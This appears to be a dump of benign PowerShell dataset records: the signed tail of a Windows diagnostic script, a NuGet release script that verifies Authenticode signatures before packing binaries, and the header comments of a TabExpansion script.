$OSArchitecture = $Env:PROCESSOR_ARCHITEW6432
}
else
{
$OSArchitecture = $Env:PROCESSOR_ARCHITECTURE
}
$ReturnObjectMember += @{'OSArchitecture' = $OSArchitecture}
$ReturnObjectMember += @{'OS64Bit' = [Environment]::Is64BitOperatingSystem}
if (Test-Path ($PWD.Path + "\DiagPackage.diagpkg"))
{
[xml] $DiagPackageXML = Get-Content -Path ($PWD.Path + "\DiagPackage.diagpkg")
$DiagID = 'Unknown'
if ($DiagPackageXML -ne $null)
{
$DiagID = $DiagPackageXML.DiagnosticPackage.DiagnosticIdentification.ID
}
$ReturnObjectMember += @{'DiagId' = $DiagID}
}
Return $ReturnObjectMember
}
###End Entity Function (EntityID=5a129654-cefb-4195-849c-6b0afb48e198)
############################### Shared Code ################################
############################ End Shared Code ###############################
######################### End Non-Editable REGION #########################
#**************************** END AUTO GENERAGED ***************************
##**************************************************************************
# SIG # Begin signature block
# MIIoVQYJKoZIhvcNAQcCoIIoRjCCKEICAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCdUJa1JjEuC/na
# sAbW8Z+TFjKvyOqbn0FsMdNh0GRXgKCCDYUwggYDMIID66ADAgECAhMzAAAEA73V
# lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV
# LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY
# oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi
# kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/
# /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv
# ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw
# VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh
# dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW
# gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw
# MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx
# XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB
# AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r
# EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV
# NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC
# rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos
# oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB
# +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO
# raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+
# sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W
# +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s
# IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu
# iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK
# YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm
# aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw
# OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD
# VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG
# 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la
# UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc
# 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D
# dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+
# lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk
# kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6
# A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd
# X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL
# 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd
# sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3
# T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS
# 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI
# bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL
# BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD
# uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv
# c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF
# BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h
# cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA
# YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn
# 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7
# v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b
# pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/
# KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy
# CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp
# mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi
# hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb
# BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS
# oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL
# gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX
# cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGiYwghoiAgEBMIGVMH4x
# CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
# b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p
# Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA
# BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw
# HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIDjw
# ObEtyKrQ3FEg8hsJqstVF617+Ctwqsbpha8D2nZMMEIGCisGAQQBgjcCAQwxNDAy
# oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20wDQYJKoZIhvcNAQEBBQAEggEAAZDTL0kgH8/BsiuiB0/mi011kJ8XEj80tUqx
# SRdQfuph3UWXZA19awKpVr2603mM3rH/Zh6t0/lzgUx/9YXuuhRIL/4uvnMTmT/3
# LpeHVd8su02R76ucs+zGzOo8Q9JLqcxOLNKpds6pxIvx+IzfbTNnVJqY8Gj0XIi5
# nLlKaiFXVoCvh5q59loIZCkANcGXnfklZjgf+cVtLtaH4oajh2gfzn5a4bESuMjs
# u1pKBllmkO9CPMgO05uIhrX2d4Q60tTk3EQnhRr2xnQ2l5g/CJU3sedZPRuIzLwO
# THwaaODXjvR+ymKBvGRwGiGzsh3vRMOAKY1VCp8f1AjoiVTo+6GCF7AwghesBgor
# BgEEAYI3AwMBMYIXnDCCF5gGCSqGSIb3DQEHAqCCF4kwgheFAgEDMQ8wDQYJYIZI
# AWUDBAIBBQAwggFaBgsqhkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGE
# WQoDATAxMA0GCWCGSAFlAwQCAQUABCDN9J12LwoM6tgYVN98O7Gpxz0cYFi/H9hG
# ubknrOXdxAIGZutC6/TIGBMyMDI0MTAyODExNDA0Mi42MDlaMASAAgH0oIHZpIHW
# MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL
# EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT
# Hm5TaGllbGQgVFNTIEVTTjo0MDFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z
# b2Z0IFRpbWUtU3RhbXAgU2VydmljZaCCEf4wggcoMIIFEKADAgECAhMzAAAB/tCo
# wns0IQsBAAEAAAH+MA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w
# IFBDQSAyMDEwMB4XDTI0MDcyNTE4MzExOFoXDTI1MTAyMjE4MzExOFowgdMxCzAJ
# BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k
# MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jv
# c29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVs
# ZCBUU1MgRVNOOjQwMUEtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGlt
# ZS1TdGFtcCBTZXJ2aWNlMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA
# vLwhFxWlqA43olsE4PCegZ4mSfsH2YTSKEYv8Gn3362Bmaycdf5T3tQxpP3NWm62
# YHUieIQXw+0u4qlay4AN3IonI+47Npi9fo52xdAXMX0pGrc0eqW8RWN3bfzXPKv0
# 7O18i2HjDyLuywYyKA9FmWbePjahf9Mwd8QgygkPtwDrVQGLyOkyM3VTiHKqhGu9
# BCGVRdHW9lmPMrrUlPWiYV9LVCB5VYd+AEUtdfqAdqlzVxA53EgxSqhp6JbfEKnT
# dcfP6T8Mir0HrwTTtV2h2yDBtjXbQIaqycKOb633GfRkn216LODBg37P/xwhodXT
# 81ZC2aHN7exEDmmbiWssjGvFJkli2g6dt01eShOiGmhbonr0qXXcBeqNb6QoF8jX
# /uDVtY9pvL4j8aEWS49hKUH0mzsCucIrwUS+x8MuT0uf7VXCFNFbiCUNRTofxJ3B
# 454eGJhL0fwUTRbgyCbpLgKMKDiCRub65DhaeDvUAAJT93KSCoeFCoklPavbgQya
# hGZDL/vWAVjX5b8Jzhly9gGCdK/qi6i+cxZ0S8x6B2yjPbZfdBVfH/NBp/1Ln7xb
# eOETAOn7OT9D3UGt0q+KiWgY42HnLjyhl1bAu5HfgryAO3DCaIdV2tjvkJay2qOn
# F7Dgj8a60KQT9QgfJfwXnr3ZKibYMjaUbCNIDnxz2ykCAwEAAaOCAUkwggFFMB0G
# A1UdDgQWBBRvznuJ9SU2g5l/5/b+5CBibbHF3TAfBgNVHSMEGDAWgBSfpxVdAF5i
# XYP05dJlpxtTNRnpcjBfBgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jv
# c29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENB
# JTIwMjAxMCgxKS5jcmwwbAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRw
# Oi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRp
# bWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1Ud
# JQEB/wQMMAoGCCsGAQUFBwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsF
# AAOCAgEAiT4NUvO2lw+0dDMtsBuxmX2o3lVQqnQkuITAGIGCgI+sl7ZqZOTDd8Lq
# xsH4GWCPTztc3tr8AgBvsYIzWjFwioCjCQODq1oBMWNzEsKzckHxAzYo5Sze7OPk
# MA3DAxVq4SSR8y+TRC2GcOd0JReZ1lPlhlPl9XI+z8OgtOPmQnLLiP9qzpTHwFze
# +sbqSn8cekduMZdLyHJk3Niw3AnglU/WTzGsQAdch9SVV4LHifUnmwTf0i07iKtT
# lNkq3bx1iyWg7N7jGZABRWT2mX+YAVHlK27t9n+WtYbn6cOJNX6LsH8xPVBRYAIR
# VkWsMyEAdoP9dqfaZzwXGmjuVQ931NhzHjjG+Efw118DXjk3Vq3qUI1re34zMMTR
# zZZEw82FupF3viXNR3DVOlS9JH4x5emfINa1uuSac6F4CeJCD1GakfS7D5ayNsaZ
# 2e+sBUh62KVTlhEsQRHZRwCTxbix1Y4iJw+PDNLc0Hf19qX2XiX0u2SM9CWTTjsz
# 9SvCjIKSxCZFCNv/zpKIlsHx7hQNQHSMbKh0/wwn86uiIALEjazUszE0+X6rcObD
# fU4h/O/0vmbF3BMR+45rAZMAETJsRDPxHJCo/5XGhWdg/LoJ5XWBrODL44YNrN7F
# RnHEAAr06sflqZ8eeV3FuDKdP5h19WUnGWwO1H/ZjUzOoVGiV3gwggdxMIIFWaAD
# AgECAhMzAAAAFcXna54Cm0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYD
# VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe
# MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3Nv
# ZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIy
# MjVaFw0zMDA5MzAxODMyMjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo
# aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y
# cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw
# MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5
# vQ7VgtP97pwHB9KpbE51yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64
# NmeFRiMMtY0Tz3cywBAY6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhu
# je3XD9gmU3w5YQJ6xKr9cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl
# 3GoPz130/o5Tz9bshVZN7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPg
# yY9+tVSP3PoFVZhtaDuaRr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I
# 5JasAUq7vnGpF1tnYN74kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2
# ci/bfV+AutuqfjbsNkz2K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/
# TNuvXsLz1dhzPUNOwTM5TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy
# 16cg8ML6EgrXY28MyTZki1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y
# 1BzFa/ZcUlFdEtsluq9QBXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6H
# XtqPnhZyacaue7e3PmriLq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMB
# AAEwIwYJKwYBBAGCNxUCBBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQW
# BBSfpxVdAF5iXYP05dJlpxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30B
# ATBBMD8GCCsGAQUFBwIBFjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz
# L0RvY3MvUmVwb3NpdG9yeS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYB
# BAGCNxQCBAweCgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMB
# Af8wHwYDVR0jBBgwFoAU1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBL
# oEmgR4ZFaHR0cDovL2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMv
# TWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggr
# BgEFBQcwAoY+aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNS
# b29DZXJBdXRfMjAxMC0wNi0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1Vffwq
# reEsH2cBMSRb4Z5yS/ypb+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27
# DzHkwo/7bNGhlBgi7ulmZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pv
# vinLbtg/SHUB2RjebYIM9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9Ak
# vUCgvxm2EhIRXT0n4ECWOKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWK
# NsIdw2FzLixre24/LAl4FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2
# kQH2zsZ0/fZMcm8Qq3UwxTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+
# c23Kjgm9swFXSVRk2XPXfx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep
# 8beuyOiJXk+d0tBMdrVXVAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+Dvk
# txW/tM4+pTFRhLy/AsGConsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1Zyvg
# DbjmjJnW4SLq8CdCPSWU5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/
# 2XBjU02N7oJtpQUQwXEGahC0HVUzWLOhcGbyoYIDWTCCAkECAQEwggEBoYHZpIHW
# MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL
# EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT
# Hm5TaGllbGQgVFNTIEVTTjo0MDFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z
# b2Z0IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUAhGNHD/a7Q0bQ
# LWVG9JuGxgLRXseggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx
# MDANBgkqhkiG9w0BAQsFAAIFAOrJ0ggwIhgPMjAyNDEwMjgwOTA0MDhaGA8yMDI0
# MTAyOTA5MDQwOFowdzA9BgorBgEEAYRZCgQBMS8wLTAKAgUA6snSCAIBADAKAgEA
# AgIIsAIB/zAHAgEAAgISxjAKAgUA6ssjiAIBADA2BgorBgEEAYRZCgQCMSgwJjAM
# BgorBgEEAYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEB
# CwUAA4IBAQAzScy1wBbpcAxuJLYnsTb2C1R/1ZXPRTrV+7w4izx+oXOHAUu9aHGG
# 0qSOBjk7VgyCvjFMirT11HILBBTHTiJcA1z5b5OIdys0RWWcnLCQGSKItm8KNNpe
# E+oE9viQRHMLsU/3b8huzWEHTDeOOyc8wNVIJCcPXDGQg42Yf1qMqoPpqyCmMTSj
# n3XQ0nllmNeGCeUkdIsNTpwD4mbbVXPVq+KbVt/jatJZw3YrTnjzg1j5AdrolA/a
# N3CjM0gf25XwDETanz7KLbHkfz5gxAN8qJTYbSOoyGTYr8cl5Rqrrp+0jwplK+S9
# FVUpwZNtKUwYSNiOSsA9S5bfDmOgcd8kMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UE
# BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc
# BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0
# IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAH+0KjCezQhCwEAAQAAAf4wDQYJYIZI
# AWUDBAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG
# 9w0BCQQxIgQgtek3MR2/iF/hr7Fk76zPYQUEjoEFYAHxN2TLi5ZGffswgfoGCyqG
# SIb3DQEJEAIvMYHqMIHnMIHkMIG9BCARhczd/FPInxjR92m2hPWqc+vGOG1+/I0W
# tkCstyh0eTCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5n
# dG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9y
# YXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMz
# AAAB/tCowns0IQsBAAEAAAH+MCIEIBHab5Kt80GYeIFqPjdXAVG0HIgzkQ3JSwH6
# 5KUaSnvoMA0GCSqGSIb3DQEBCwUABIICACOjZ5hjopDYXVlmpwQCynTUjKIYMRwF
# EEuMObK9eG9TU2WWKtbyBTtKT7dHcIzXOf+1931TQSvT8A0YNLi7xTGB5liVUp9X
# tSsV2YF+KyoyQ7HThuoB+xmmUrtzdNSqeaVXcHEA6w6mWOspBbFidZRPlFNWcywF
# 3W9rFweopxhvYVW2rcT/43K5BrfWugYMALy8BNwN7j/7wwtCr71CTVgouE+guk9X
# vuzpBJRjRv/o6ryEMOFaH/A4tMP45kIvY95HNjDB5+YJPkQX0PtTpnhVCnIaICkz
# Lg9TtYgXz/UguQxTq5rnhzvNBpEbsHsMSNDqLx33vGMJWh0VupQy0P4fdtsUieBo
# kMG0Wgfb6ZS8BRUfjV9cOJsno6M8r/seajny0c7VC3X/v4csfKg6w9kPd9ydaRvg
# uceE7qTkmRz6E7pxYrpOP9GtHQFyEX7ECz4PEmjnjIoc+nFVsy1OZXTGZICRLqe8
# VgcMdG8QZ1LLtHHQQ3cE2WqC7y6n7bADNhp1oeQm6h0bN2bXFZ2kEcKNhRla2VKv
# 8b19CALQcu66A5lhF3sy7ZReY7mk8abfLp5LG3BRRFQ8GCptDaXRZ2mxQNihDSaX
# rc6owx1TMePHRrxWEu36Sf0oqO0Dr+ACuT8ybvrL0hHXkCLzPU/TK+NO/uyErUN2
# 2Jm0dHOouglv
# SIG # End signature block
|
combined_dataset/train/non-malicious/775.ps1
|
775.ps1
|
param($FailIfNotSigned = $true)
$releasePath = [System.IO.Path]::GetFullPath("$PSScriptRoot\..\release")
$finalPackagePath = [System.IO.Path]::GetFullPath("$releasePath\FinalPackages")
$binariesToSignPath = [System.IO.Path]::GetFullPath("$releasePath\BinariesToSign")
$unpackedPackagesPath = [System.IO.Path]::GetFullPath("$releasePath\UnpackedPackages")
$nugetPath = [System.IO.Path]::GetFullPath("$PSScriptRoot\..\.nuget\NuGet.exe")
mkdir $finalPackagePath -Force | Out-Null
$binaries = Get-ChildItem $binariesToSignPath
foreach ($binaryPath in $binaries) {
$signature = Get-AuthenticodeSignature $binaryPath.FullName
if ($signature.Status -eq "NotSigned" -and $FailIfNotSigned) {
Write-Error "Binary file is not authenticode signed: $binaryPath" -ErrorAction Stop
}
$packageName = [System.IO.Path]::GetFileNameWithoutExtension($binaryPath)
$packageName = $packageName.TrimEnd(".x86")
$packagePath = "$unpackedPackagesPath\$packageName"
cp $binaryPath.FullName -Destination "$packagePath\lib\net45\" -Force
Push-Location $finalPackagePath
& $nugetPath pack "$packagePath\$packageName.nuspec"
Pop-Location
}
|
combined_dataset/train/non-malicious/TabExpansion for V2CTP_1.ps1
|
TabExpansion for V2CTP_1.ps1
|
## Tab-Completion
#################
## For V2CTP3.
## This won't work on V1 and V2CTP and V2CTP2.
## Please dot souce this script file.
## In first loading, it may take a several minutes, in order to generate ProgIDs and TypeNames list.
##
## What this can do is:
##
## [datetime]::n<tab>
## [datetime]::now.d<tab>
## $a = New-Object "Int32[,]" 2,3; $b = "PowerShell","PowerShell"
## $c = [ref]$a; $d = [ref]$b,$c
